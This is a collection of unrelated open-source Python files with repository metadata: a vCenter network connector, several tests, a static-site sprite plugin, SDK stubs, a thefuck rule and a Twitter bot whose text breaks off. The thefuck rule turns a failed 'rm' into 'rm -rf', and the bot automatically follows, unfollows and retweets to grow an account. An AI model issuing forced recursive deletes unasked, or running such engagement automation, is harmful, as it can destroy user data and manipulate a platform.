"id": "54921ca954b7574da2c912e258e1773ee1b073f1",
"size": "5083",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "promrep/scripts/import_life_data.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "788"
},
{
"name": "HTML",
"bytes": "99560"
},
{
"name": "JavaScript",
"bytes": "10628"
},
{
"name": "Jinja",
"bytes": "220"
},
{
"name": "Python",
"bytes": "668975"
},
{
"name": "SCSS",
"bytes": "73040"
},
{
"name": "Shell",
"bytes": "6209"
}
],
"symlink_target": ""
}
|
class VmNetworkMapping(object):
def __init__(self):
self.vnic_name = ''
self.dv_port_name = ''
self.dv_switch_name = ''
self.dv_switch_path = ''
self.vlan_id = ''
self.vlan_spec = ''
class VmNetworkRemoveMapping(object):
def __init__(self):
self.vnic_name = ''
self.network_name = ''
class ConnectRequest(object):
def __init__(self, vnic_name, network):
"""
model for the reconfigure request
:param vnic_name: str
:param network: vim.Network
"""
self.vnic_name = vnic_name
self.network = network
class VirtualSwitchToMachineConnector(object):
def __init__(self,
dv_port_group_creator,
virtual_machine_port_group_configurer):
"""
:param dv_port_group_creator: <DvPortGroupCreator> instance/interface
:param virtual_machine_port_group_configurer: <VirtualMachinePortGroupConfigurer> instance/interface
:type virtual_machine_port_group_configurer: cloudshell.cp.vcenter.vm.portgroup_configurer.VirtualMachinePortGroupConfigurer
:return:
"""
self.dv_port_group_creator = dv_port_group_creator
self.virtual_machine_port_group_configurer = virtual_machine_port_group_configurer
def connect_by_mapping(self, si, vm, mapping, default_network, reserved_networks, logger, promiscuous_mode):
"""
gets the mapping to the vnics and connects it to the vm
:param default_network:
:param si: ServiceInstance
:param vm: vim.VirtualMachine
:param mapping: [VmNetworkMapping]
:param reserved_networks:
:param logger:
        :param promiscuous_mode: <str> 'True' or 'False' turn on/off promiscuous mode for the port group
"""
request_mapping = []
logger.debug(
'about to map to the vm: {0}, the following networks'.format(vm.name if vm.name else vm.config.uuid))
for network_map in mapping:
network = self.dv_port_group_creator.get_or_create_network(si,
vm,
network_map.dv_port_name,
network_map.dv_switch_name,
network_map.dv_switch_path,
network_map.vlan_id,
network_map.vlan_spec,
logger,
promiscuous_mode)
request_mapping.append(ConnectRequest(network_map.vnic_name, network))
logger.debug(str(request_mapping))
return self.virtual_machine_port_group_configurer.connect_vnic_to_networks(vm,
request_mapping,
default_network,
reserved_networks,
logger)
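# Hedged usage sketch (the service instance `si`, `vm`, `logger` and the two
# collaborator objects are assumed to be built elsewhere in the cloudshell
# package; the values below are illustrative only):
#
#   mapping = VmNetworkMapping()
#   mapping.vnic_name = 'Network adapter 1'
#   mapping.dv_port_name = 'QS_VLAN_100'
#   mapping.dv_switch_name = 'dvSwitch'
#   mapping.dv_switch_path = 'datacenter'
#   mapping.vlan_id = 100
#   mapping.vlan_spec = 'Access'
#
#   connector = VirtualSwitchToMachineConnector(dv_port_group_creator,
#                                               vm_port_group_configurer)
#   connector.connect_by_mapping(si, vm, [mapping], default_network=None,
#                                reserved_networks=[], logger=logger,
#                                promiscuous_mode='True')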
|
{
"content_hash": "b36c9b188678af2bdfbadd63de8743fe",
"timestamp": "",
"source": "github",
"line_count": 76,
"max_line_length": 132,
"avg_line_length": 45.18421052631579,
"alnum_prop": 0.47815958066394876,
"repo_name": "QualiSystems/vCenterShell",
"id": "9fcaba8935a28a335af0a9a0f3f1e620650ffc63",
"size": "3435",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "package/cloudshell/cp/vcenter/vm/dvswitch_connector.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "8339"
},
{
"name": "Makefile",
"bytes": "7672"
},
{
"name": "Python",
"bytes": "629506"
},
{
"name": "Shell",
"bytes": "646"
}
],
"symlink_target": ""
}
|
import os
import sys
if __name__ == '__main__':
os.environ.setdefault(
'DJANGO_SETTINGS_MODULE', 'ics_generator.tests.south_settings')
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
{
"content_hash": "3b32a7c7e4876271c39a95e4d819f409",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 71,
"avg_line_length": 25.5,
"alnum_prop": 0.6941176470588235,
"repo_name": "bitmazk/django-ics-generator",
"id": "4b428aa5e8e9ad14d96f135c6d301a5dd5ae751c",
"size": "277",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "manage.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "6741"
}
],
"symlink_target": ""
}
|
import os
import sys
import pipes
import shutil
import subprocess
"""
This plugin uses glue to sprite images:
http://glue.readthedocs.org/en/latest/quickstart.html
Install:
(Only if you want to sprite jpg too)
brew install libjpeg
(Only if you want to optimize pngs with optipng)
brew install optipng
sudo easy_install pip
sudo pip uninstall pil
sudo pip install pil
sudo pip install glue
"""
try:
import glue
except Exception as e:
sys.exit('Could not use glue: %s\nMaybe install: sudo easy_install glue' % e)
IMG_PATH = 'static/img/sprites'
CSS_PATH = 'static/css/sprites'
KEY = '_PREV_CHECKSUM'
def checksum(path):
    command = 'md5 `find %s -type f`' % pipes.quote(path)
    return subprocess.check_output(command, shell=True)
def preBuild(site):
currChecksum = checksum(IMG_PATH)
prevChecksum = getattr(site, KEY, None)
# Don't run if none of the images has changed
if currChecksum == prevChecksum:
return
if os.path.isdir(CSS_PATH):
shutil.rmtree(CSS_PATH)
os.mkdir(CSS_PATH)
os.system('glue --cachebuster --crop --optipng "%s" "%s" --project' % (IMG_PATH, CSS_PATH))
setattr(site, KEY, currChecksum)
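    # The checksum is stashed on the `site` object between builds, so repeated
    # preBuild() calls in one Cactus session skip re-spriting when nothing
    # under IMG_PATH has changed.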
|
{
"content_hash": "393be6421520b4f6e797ec8cac25573e",
"timestamp": "",
"source": "github",
"line_count": 55,
"max_line_length": 95,
"avg_line_length": 21.527272727272727,
"alnum_prop": 0.700168918918919,
"repo_name": "koenbok/Cactus",
"id": "730dbcfc39521741fb3a9283b9aa498dfce1fb51",
"size": "1184",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "cactus/tests/data/skeleton/plugins/sprites.disabled.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "261"
},
{
"name": "HTML",
"bytes": "8133"
},
{
"name": "JavaScript",
"bytes": "60"
},
{
"name": "Makefile",
"bytes": "448"
},
{
"name": "Python",
"bytes": "238893"
}
],
"symlink_target": ""
}
|
import typing
import revoke_dataset_access
import update_dataset_access
if typing.TYPE_CHECKING:
import pytest
from google.cloud import bigquery
def test_dataset_access_permissions(
capsys: "pytest.CaptureFixture[str]",
dataset_id: str,
entity_id: str,
bigquery_client: "bigquery.Client",
) -> None:
original_dataset = bigquery_client.get_dataset(dataset_id)
update_dataset_access.update_dataset_access(dataset_id, entity_id)
full_dataset_id = "{}.{}".format(
original_dataset.project, original_dataset.dataset_id
)
out, err = capsys.readouterr()
assert (
"Updated dataset '{}' with modified user permissions.".format(full_dataset_id)
in out
)
updated_dataset = bigquery_client.get_dataset(dataset_id)
updated_dataset_entries = list(updated_dataset.access_entries)
updated_dataset_entity_ids = {entry.entity_id for entry in updated_dataset_entries}
assert entity_id in updated_dataset_entity_ids
revoke_dataset_access.revoke_dataset_access(dataset_id, entity_id)
revoked_dataset = bigquery_client.get_dataset(dataset_id)
revoked_dataset_entries = list(revoked_dataset.access_entries)
full_dataset_id = f"{updated_dataset.project}.{updated_dataset.dataset_id}"
out, err = capsys.readouterr()
assert (
f"Revoked dataset access for '{entity_id}' to ' dataset '{full_dataset_id}.'"
in out
)
assert len(revoked_dataset_entries) == len(updated_dataset_entries) - 1
revoked_dataset_entity_ids = {entry.entity_id for entry in revoked_dataset_entries}
assert entity_id not in revoked_dataset_entity_ids
|
{
"content_hash": "e1096544b4877577fd4b5d9c0b131b3c",
"timestamp": "",
"source": "github",
"line_count": 45,
"max_line_length": 87,
"avg_line_length": 36.644444444444446,
"alnum_prop": 0.7077016373559734,
"repo_name": "googleapis/python-bigquery",
"id": "4d1a70eb1ede0c1f9d4bf0af184a48c7f53be373",
"size": "2225",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "samples/snippets/dataset_access_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2050"
},
{
"name": "Python",
"bytes": "2520564"
},
{
"name": "Shell",
"bytes": "31939"
}
],
"symlink_target": ""
}
|
import wpan
from wpan import verify
# -----------------------------------------------------------------------------------------------------------------------
# Test description: Router table
#
# Verify router table entries on a network with 4 routers:
# {r1, r2, r3} forming a loop with r4 connecting to r3.
#
test_name = __file__[:-3] if __file__.endswith('.py') else __file__
print('-' * 120)
print('Starting \'{}\''.format(test_name))
# -----------------------------------------------------------------------------------------------------------------------
# Creating `wpan.Nodes` instances
speedup = 4
wpan.Node.set_time_speedup_factor(speedup)
r1 = wpan.Node()
r2 = wpan.Node()
r3 = wpan.Node()
r4 = wpan.Node()
c4 = wpan.Node()
# -----------------------------------------------------------------------------------------------------------------------
# Init all nodes
wpan.Node.init_all_nodes()
# -----------------------------------------------------------------------------------------------------------------------
# Build network topology
#
#
# r1 ------ r2
# \ /
# \ /
# \ /
# r3 _____ r4
#
#
r1.form("route-table")
r1.whitelist_node(r2)
r2.whitelist_node(r1)
r2.join_node(r1, wpan.JOIN_TYPE_ROUTER)
r2.whitelist_node(r3)
r3.whitelist_node(r2)
r3.join_node(r2, wpan.JOIN_TYPE_ROUTER)
r3.whitelist_node(r1)
r1.whitelist_node(r3)
r3.whitelist_node(r4)
r4.whitelist_node(r3)
r4.join_node(r3, wpan.JOIN_TYPE_ROUTER)
# c4 is attached to r4 so that it quickly gets promoted to a router role.
c4.whitelist_node(r4)
r4.whitelist_node(c4)
c4.join_node(r4, wpan.JOIN_TYPE_SLEEPY_END_DEVICE)
c4.set(wpan.WPAN_POLL_INTERVAL, '2000')
# -----------------------------------------------------------------------------------------------------------------------
# Test implementation
#
verify(r1.get(wpan.WPAN_NODE_TYPE) == wpan.NODE_TYPE_LEADER)
verify(r2.get(wpan.WPAN_NODE_TYPE) == wpan.NODE_TYPE_ROUTER)
verify(r3.get(wpan.WPAN_NODE_TYPE) == wpan.NODE_TYPE_ROUTER)
verify(r4.get(wpan.WPAN_NODE_TYPE) == wpan.NODE_TYPE_ROUTER)
r1_id = int(r1.get(wpan.WPAN_THREAD_ROUTER_ID), 0)
r2_id = int(r2.get(wpan.WPAN_THREAD_ROUTER_ID), 0)
r3_id = int(r3.get(wpan.WPAN_THREAD_ROUTER_ID), 0)
r4_id = int(r4.get(wpan.WPAN_THREAD_ROUTER_ID), 0)
r1_ext_addr = r1.get(wpan.WPAN_EXT_ADDRESS)[1:-1]
r2_ext_addr = r2.get(wpan.WPAN_EXT_ADDRESS)[1:-1]
r3_ext_addr = r3.get(wpan.WPAN_EXT_ADDRESS)[1:-1]
r4_ext_addr = r4.get(wpan.WPAN_EXT_ADDRESS)[1:-1]
r1_rloc = int(r1.get(wpan.WPAN_THREAD_RLOC16), 16)
r2_rloc = int(r2.get(wpan.WPAN_THREAD_RLOC16), 16)
r3_rloc = int(r3.get(wpan.WPAN_THREAD_RLOC16), 16)
r4_rloc = int(r4.get(wpan.WPAN_THREAD_RLOC16), 16)
WAIT_TIME = 30 / speedup + 5
INVALID_ROUTER_ID = 63
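# (With speedup 4, WAIT_TIME comes to roughly 12 seconds of real time for
# each verify_within() call below while the router tables converge.)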
def check_r1_router_table():
router_table = wpan.parse_router_table_result(
r1.get(wpan.WPAN_THREAD_ROUTER_TABLE))
verify(len(router_table) == 4)
for entry in router_table:
if entry.rloc16 == r1_rloc:
pass
elif entry.rloc16 == r2_rloc:
# r1 should be directly connected to r2.
verify(entry.is_link_established())
verify(entry.ext_address == r2_ext_addr)
elif entry.rloc16 == r3_rloc:
# r1 should be directly connected to r3.
verify(entry.is_link_established())
verify(entry.ext_address == r3_ext_addr)
elif entry.rloc16 == r4_rloc:
# r1's next hop towards r4 should be through r3.
verify(not entry.is_link_established())
verify(entry.next_hop == r3_id)
else:
            raise wpan.VerifyError("unknown entry in the router table of r1")
wpan.verify_within(check_r1_router_table, WAIT_TIME)
def check_r3_router_table():
router_table = wpan.parse_router_table_result(
r3.get(wpan.WPAN_THREAD_ROUTER_TABLE))
verify(len(router_table) == 4)
for entry in router_table:
if entry.rloc16 == r1_rloc:
# r3 should be directly connected to r1.
verify(entry.is_link_established())
verify(entry.ext_address == r1_ext_addr)
elif entry.rloc16 == r2_rloc:
# r3 should be directly connected to r2.
verify(entry.is_link_established())
verify(entry.ext_address == r2_ext_addr)
elif entry.rloc16 == r3_rloc:
pass
elif entry.rloc16 == r4_rloc:
# r3 should be directly connected to r4.
verify(entry.is_link_established())
verify(entry.ext_address == r4_ext_addr)
else:
            raise wpan.VerifyError("unknown entry in the router table of r3")
wpan.verify_within(check_r3_router_table, WAIT_TIME)
def check_r4_router_table():
router_table = wpan.parse_router_table_result(
r4.get(wpan.WPAN_THREAD_ROUTER_TABLE))
verify(len(router_table) == 4)
for entry in router_table:
if entry.rloc16 == r1_rloc:
# r4's next hop towards r1 should be through r3.
verify(not entry.is_link_established())
verify(entry.next_hop == r3_id)
elif entry.rloc16 == r2_rloc:
# r4's next hop towards r2 should be through r3.
verify(not entry.is_link_established())
verify(entry.next_hop == r3_id)
elif entry.rloc16 == r3_rloc:
# r4 should be directly connected to r3.
verify(entry.is_link_established())
verify(entry.ext_address == r3_ext_addr)
elif entry.rloc16 == r4_rloc:
pass
else:
            raise wpan.VerifyError("unknown entry in the router table of r4")
wpan.verify_within(check_r4_router_table, WAIT_TIME)
# -----------------------------------------------------------------------------------------------------------------------
# Test finished
wpan.Node.finalize_all_nodes()
print('\'{}\' passed.'.format(test_name))
|
{
"content_hash": "0778641984e32d569e3babe865ca16f5",
"timestamp": "",
"source": "github",
"line_count": 178,
"max_line_length": 121,
"avg_line_length": 33.08426966292135,
"alnum_prop": 0.5515367634572933,
"repo_name": "lanyuwen/openthread",
"id": "41b98f53832d347f4acf126e103df0d393048548",
"size": "7492",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/toranj/test-020-router-table.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "10128"
},
{
"name": "C",
"bytes": "504489"
},
{
"name": "C#",
"bytes": "18077"
},
{
"name": "C++",
"bytes": "3008688"
},
{
"name": "M4",
"bytes": "42638"
},
{
"name": "Makefile",
"bytes": "77019"
},
{
"name": "Python",
"bytes": "1017946"
},
{
"name": "Ruby",
"bytes": "3397"
},
{
"name": "Shell",
"bytes": "17185"
}
],
"symlink_target": ""
}
|
from orangengine.drivers.base import BaseDriver
from orangengine.drivers.juniper_srx import JuniperSRXDriver
from orangengine.drivers.palo_alto_panorama import PaloAltoPanoramaDriver
from orangengine.drivers.palo_alto_base import PaloAltoBaseDriver
__all__ = ['BaseDriver', 'JuniperSRXDriver', 'PaloAltoPanoramaDriver', 'PaloAltoBaseDriver', ]
|
{
"content_hash": "27ce4d2e51161509deb2e8e048ae04c2",
"timestamp": "",
"source": "github",
"line_count": 7,
"max_line_length": 94,
"avg_line_length": 49.42857142857143,
"alnum_prop": 0.8352601156069365,
"repo_name": "lampwins/orangengine",
"id": "7f63e21a824a670a871302240794866c92bcef72",
"size": "370",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "orangengine/drivers/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "125410"
}
],
"symlink_target": ""
}
|
"""Some utilities that may help.
"""
from iterables import (iff, flatten, group, take, subsets,
variations, numbered_symbols, cartes, capture, any, all, dict_merge,
postorder_traversal, preorder_traversal, interactive_traversal,
prefixes, postfixes, sift)
from lambdify import lambdify
from source import source
from decorator import threaded, xthreaded, deprecated, wraps
from cythonutils import cythonized
from timeutils import timed
|
{
"content_hash": "0324f2e4297862f24811ec6fdf6be292",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 72,
"avg_line_length": 32.214285714285715,
"alnum_prop": 0.7804878048780488,
"repo_name": "pernici/sympy",
"id": "d8352fa34a262ca8d6b1a8f705bb6f96a30f04ac",
"size": "451",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "sympy/utilities/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "6531741"
},
{
"name": "Scheme",
"bytes": "125"
},
{
"name": "TeX",
"bytes": "8"
},
{
"name": "XSLT",
"bytes": "366202"
}
],
"symlink_target": ""
}
|
import zstackwoodpecker.test_state as ts_header
import os
TestAction = ts_header.TestAction
def path():
return dict(initial_formation="template5", checking_point=1, faild_point=100000, path_list=[
[TestAction.create_mini_vm, 'vm1', 'cluster=cluster2'],
[TestAction.create_volume, 'volume1', 'cluster=cluster2', 'flag=scsi'],
[TestAction.attach_volume, 'vm1', 'volume1'],
[TestAction.create_volume_backup, 'volume1', 'volume1-backup1'],
[TestAction.create_mini_vm, 'vm2', 'cpu=random', 'cluster=cluster1'],
[TestAction.create_image_from_volume, 'vm2', 'vm2-image1'],
[TestAction.poweroff_only, 'cluster=cluster1'],
[TestAction.create_volume, 'volume2', 'cluster=cluster2', 'flag=scsi'],
[TestAction.attach_volume, 'vm1', 'volume2'],
[TestAction.create_volume, 'volume3', 'cluster=cluster1', 'flag=scsi'],
[TestAction.delete_volume, 'volume3'],
[TestAction.add_image, 'image2', 'root', 'http://172.20.1.28/mirror/diskimages/centos_vdbench.qcow2'],
[TestAction.create_volume, 'volume4', 'cluster=cluster1', 'flag=scsi'],
[TestAction.attach_volume, 'vm2', 'volume4'],
[TestAction.start_vm, 'vm2'],
[TestAction.create_volume_backup, 'volume4', 'volume4-backup2'],
[TestAction.stop_vm, 'vm2'],
[TestAction.delete_volume_backup, 'volume4-backup2'],
[TestAction.delete_image, 'vm2-image1'],
[TestAction.expunge_image, 'vm2-image1'],
[TestAction.start_vm, 'vm2'],
[TestAction.create_vm_backup, 'vm2', 'vm2-backup3'],
[TestAction.stop_vm, 'vm2'],
[TestAction.start_vm, 'vm2'],
[TestAction.reboot_vm, 'vm2'],
[TestAction.poweroff_only, 'cluster=cluster1'],
[TestAction.resize_volume, 'vm1', 5*1024*1024],
[TestAction.create_volume, 'volume5', 'size=random', 'cluster=cluster1', 'flag=scsi'],
[TestAction.create_volume, 'volume6', 'cluster=cluster2', 'flag=thick,scsi'],
[TestAction.delete_vm_backup, 'vm2-backup3'],
[TestAction.start_vm, 'vm1'],
[TestAction.stop_vm, 'vm1'],
[TestAction.expunge_volume, 'volume3'],
[TestAction.create_mini_vm, 'vm3', 'data_volume=true', 'cluster=cluster2'],
[TestAction.attach_volume, 'vm3', 'volume6'],
[TestAction.create_volume_backup, 'volume6', 'volume6-backup5'],
[TestAction.resize_data_volume, 'volume2', 5*1024*1024],
[TestAction.poweroff_only, 'cluster=cluster2'],
[TestAction.delete_volume_backup, 'volume6-backup5'],
])
'''
The final status:
Running:[]
Stopped:['vm2', 'vm1', 'vm3']
Enabled:['volume1-backup1', 'image2']
attached:['volume1', 'volume2', 'volume4', 'auto-volume3', 'volume6']
Detached:['volume5']
Deleted:['volume4-backup2', 'vm2-backup3', 'volume4-backup3', 'volume6-backup5']
Expunged:['volume3', 'vm2-image1']
Ha:[]
Group:
'''
|
{
"content_hash": "7d1d223df724584536f2bfa461b5ac8b",
"timestamp": "",
"source": "github",
"line_count": 62,
"max_line_length": 104,
"avg_line_length": 42.983870967741936,
"alnum_prop": 0.6964352720450282,
"repo_name": "zstackio/zstack-woodpecker",
"id": "630d3af4668916d6c4d92f06d75c2f928c5f8b9b",
"size": "2665",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "integrationtest/vm/mini/multiclusters/paths/multi_path207.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2356"
},
{
"name": "Go",
"bytes": "49822"
},
{
"name": "Makefile",
"bytes": "687"
},
{
"name": "Puppet",
"bytes": "875"
},
{
"name": "Python",
"bytes": "13070596"
},
{
"name": "Shell",
"bytes": "177861"
}
],
"symlink_target": ""
}
|
import re
def match(command, settings):
return ('rm' in command.script
and 'is a directory' in command.stderr)
def get_new_command(command, settings):
return re.sub('^rm (.*)', 'rm -rf \\1', command.script)
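if __name__ == '__main__':
    # Hedged self-test with a hypothetical stand-in for thefuck's command
    # object; the real rule receives a richer Command value from the app.
    from collections import namedtuple
    Command = namedtuple('Command', ['script', 'stderr'])
    cmd = Command('rm foo', 'rm: foo: is a directory')
    assert match(cmd, None)
    assert get_new_command(cmd, None) == 'rm -rf foo'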
|
{
"content_hash": "5fc4c39022308105d0498b05ef21da2f",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 59,
"avg_line_length": 25.555555555555557,
"alnum_prop": 0.6347826086956522,
"repo_name": "JensTimmerman/thefuck",
"id": "f9349ea45051156c96eead5875fdb777140119d5",
"size": "230",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "thefuck/rules/rm_dir.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "19217"
}
],
"symlink_target": ""
}
|
import pytest
from mitmproxy.test.tflow import tflow
from mitmproxy.tools.console import defaultkeys, quickhelp
from mitmproxy.tools.console.eventlog import EventLog
from mitmproxy.tools.console.flowlist import FlowListBox
from mitmproxy.tools.console.flowview import FlowView
from mitmproxy.tools.console.grideditor import PathEditor
from mitmproxy.tools.console.help import HelpView
from mitmproxy.tools.console.keybindings import KeyBindings
from mitmproxy.tools.console.keymap import Keymap
from mitmproxy.tools.console.options import Options
from mitmproxy.tools.console.overlay import SimpleOverlay
@pytest.fixture(scope="module")
def keymap() -> Keymap:
km = Keymap(None)
defaultkeys.map(km)
return km
tflow2 = tflow()
tflow2.intercept()
tflow2.backup()
tflow2.marked = "x"
@pytest.mark.parametrize(
"widget, flow, is_root_widget",
[
(FlowListBox, None, False),
(FlowListBox, tflow(), False),
(FlowView, tflow2, True),
(KeyBindings, None, True),
(Options, None, True),
(HelpView, None, False),
(EventLog, None, True),
(PathEditor, None, False),
(SimpleOverlay, None, False),
]
)
def test_quickhelp(widget, flow, keymap, is_root_widget):
qh = quickhelp.make(widget, flow, is_root_widget)
for row in [qh.top_items, qh.bottom_items]:
for (title, v) in row.items():
if isinstance(v, quickhelp.BasicKeyHelp):
key_short = v.key
else:
b = keymap.binding_for_help(v)
if b is None:
raise AssertionError(f"No binding found for help text: {v}")
key_short = b.key_short()
assert len(key_short) + len(title) < 14
def test_make_rows():
keymap = Keymap(None)
defaultkeys.map(keymap)
# make sure that we don't crash if a default binding is missing.
keymap.unbind(keymap.binding_for_help("View event log"))
qh = quickhelp.make(HelpView, None, True)
assert qh.make_rows(keymap)
|
{
"content_hash": "15cdb1133a2ca173a41800deb48aca43",
"timestamp": "",
"source": "github",
"line_count": 65,
"max_line_length": 80,
"avg_line_length": 31.29230769230769,
"alnum_prop": 0.6691248770894789,
"repo_name": "mhils/mitmproxy",
"id": "958bf6ae40fd39cafe88f8e764da4366189b7745",
"size": "2034",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "test/mitmproxy/tools/console/test_quickhelp.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "3618"
},
{
"name": "Dockerfile",
"bytes": "618"
},
{
"name": "HTML",
"bytes": "10672"
},
{
"name": "JavaScript",
"bytes": "134086"
},
{
"name": "Kaitai Struct",
"bytes": "3670"
},
{
"name": "Less",
"bytes": "21203"
},
{
"name": "PowerShell",
"bytes": "258"
},
{
"name": "Python",
"bytes": "2367991"
},
{
"name": "Shell",
"bytes": "3055"
},
{
"name": "TypeScript",
"bytes": "279053"
}
],
"symlink_target": ""
}
|
from a10sdk.common.A10BaseClass import A10BaseClass
class Stats(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param radius_response_dropped: {"description": "Query Response Dropped", "format": "counter", "type": "number", "oid": "11", "optional": true, "size": "8"}
:param radius_requst_sent: {"description": "Query Request Sent", "format": "counter", "type": "number", "oid": "8", "optional": true, "size": "8"}
:param radius_requst_dropped: {"description": "Query Request Dropped", "format": "counter", "type": "number", "oid": "9", "optional": true, "size": "8"}
:param request_insert_client_ip_performed: {"description": "HTTP Client IP Insertion Performed", "format": "counter", "type": "number", "oid": "3", "optional": true, "size": "8"}
:param radius_query_succeed: {"description": "MSISDN Query Succeed", "format": "counter", "type": "number", "oid": "6", "optional": true, "size": "8"}
:param request_insert_msisdn_unavailable: {"description": "Inserted MSISDN is 0000 (MSISDN Unavailable)", "format": "counter", "type": "number", "oid": "4", "optional": true, "size": "8"}
:param request_processed: {"description": "HTTP Request Processed", "format": "counter", "type": "number", "oid": "1", "optional": true, "size": "8"}
:param request_insert_msisdn_performed: {"description": "HTTP MSISDN Insertion Performed", "format": "counter", "type": "number", "oid": "2", "optional": true, "size": "8"}
:param radius_query_failed: {"description": "MSISDN Query Failed", "format": "counter", "type": "number", "oid": "7", "optional": true, "size": "8"}
:param queued_session_too_many: {"description": "Queued Session Exceed Drop", "format": "counter", "type": "number", "oid": "5", "optional": true, "size": "8"}
:param radius_response_received: {"description": "Query Response Received", "format": "counter", "type": "number", "oid": "10", "optional": true, "size": "8"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "stats"
self.DeviceProxy = ""
self.radius_response_dropped = ""
self.radius_requst_sent = ""
self.radius_requst_dropped = ""
self.request_insert_client_ip_performed = ""
self.radius_query_succeed = ""
self.request_insert_msisdn_unavailable = ""
self.request_processed = ""
self.request_insert_msisdn_performed = ""
self.radius_query_failed = ""
self.queued_session_too_many = ""
self.radius_response_received = ""
for keys, value in kwargs.items():
            setattr(self, keys, value)
class HttpAlg(A10BaseClass):
"""Class Description::
Statistics for the object http-alg.
Class http-alg supports CRUD Operations and inherits from `common/A10BaseClass`.
    This class is the `"PARENT"` class for this module.
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
URL for this object::
`https://<Hostname|Ip address>//axapi/v3/cgnv6/http-alg/stats`.
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.required=[]
self.b_key = "http-alg"
self.a10_url="/axapi/v3/cgnv6/http-alg/stats"
self.DeviceProxy = ""
self.stats = {}
for keys, value in kwargs.items():
            setattr(self, keys, value)
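# Hedged usage sketch (assumes an authenticated a10sdk device proxy whose
# construction lives elsewhere in the SDK; the names here are illustrative):
#
#   stats_page = HttpAlg(DeviceProxy=proxy)
#   # a GET against stats_page.a10_url ("/axapi/v3/cgnv6/http-alg/stats")
#   # returns the counters documented on the Stats class above.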
|
{
"content_hash": "9fe21a23c1ccc4113c3e667924e6d910",
"timestamp": "",
"source": "github",
"line_count": 76,
"max_line_length": 191,
"avg_line_length": 47.1578947368421,
"alnum_prop": 0.6216517857142857,
"repo_name": "amwelch/a10sdk-python",
"id": "2245c562e2fb92d9aa4d48f6e420d6da257b084c",
"size": "3584",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "a10sdk/core/cgnv6/cgnv6_http_alg_stats.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "6956398"
}
],
"symlink_target": ""
}
|
import webapp2
import tweepy
import ConfigParser
from tweepy import *
from time import ctime, gmtime, mktime, strftime
import csv
import random
class BotHandler(webapp2.RequestHandler):
def runBot(self):
config = ConfigParser.RawConfigParser()
config.read('settings.cfg')
# http://dev.twitter.com/apps/myappid
CONSUMER_KEY = config.get('Twitter', 'CONSUMER_KEY')
CONSUMER_SECRET = config.get('Twitter', 'CONSUMER_SECRET')
# http://dev.twitter.com/apps/myappid/my_token
ACCESS_TOKEN_KEY = config.get('Twitter', 'ACCESS_TOKEN_KEY')
ACCESS_TOKEN_SECRET = config.get('Twitter', 'ACCESS_TOKEN_SECRET')
auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(ACCESS_TOKEN_KEY, ACCESS_TOKEN_SECRET)
api = tweepy.API(auth)
# If the authentication was successful, you should
# see the name of the account print out
#Iam = api.me().name
# Frequency calc
freq = random.randint(1, 100)
#freq = 3
if freq <= 5:
# Tweet a random quote
self.tweetQuote(api)
# Follow back a follower
##self.followBackFollower(api)
elif freq <= 30:
# Unfollow a non-follower
self.dropNonFollower(api)
elif freq <= 60:
# Add a random follower
self.addNewFollower(api)
else:
# RT
self.searchRT(api, config)
self.response.write(freq)
def tweet(self, api, theTweet):
api.update_status(theTweet)
def retweet(self, api, theTweetID):
print(theTweetID)
api.retweet(id=theTweetID)
def searchRT(self, api, config):
searchTerms = config.get('Twitter', 'SEARCH_TERMS')
termsList = searchTerms.split(",")
term = random.choice(termsList)
self.response.write(term)
results = api.search(term, "en")
#resultsSorted = sorted(results, key=lambda tweet: tweet.retweet_count, reverse=True)
        if results:
            randTweetNum = random.randint(0, len(results) - 1)
theTweet = results[randTweetNum].text
theTweetID = results[randTweetNum].id
#print(theTweet)
self.response.write(theTweet)
self.retweet(api, theTweetID)
def tweetQuote(self, api):
# read csv
with open('quotes.csv', 'rU') as f:
reader = csv.reader(f)
quotes = list(reader)
        randQuoteNum = random.randint(0, len(quotes) - 1)
quote = quotes[randQuoteNum]
# Format quote
quoteText = quote[0]
quoteAuthor = quote[1]
# QuoteSource: Quote
quoteSource = ", "+ quote[2]
quoteWho = quote[3] +": " if quote[3] else ""
quoteHandle = quote[4]
theTweet = "\""+ quoteWho + quoteText +"\""+ quoteSource
# Tweet a quote
if len(theTweet) < 140:
self.tweet(api, theTweet)
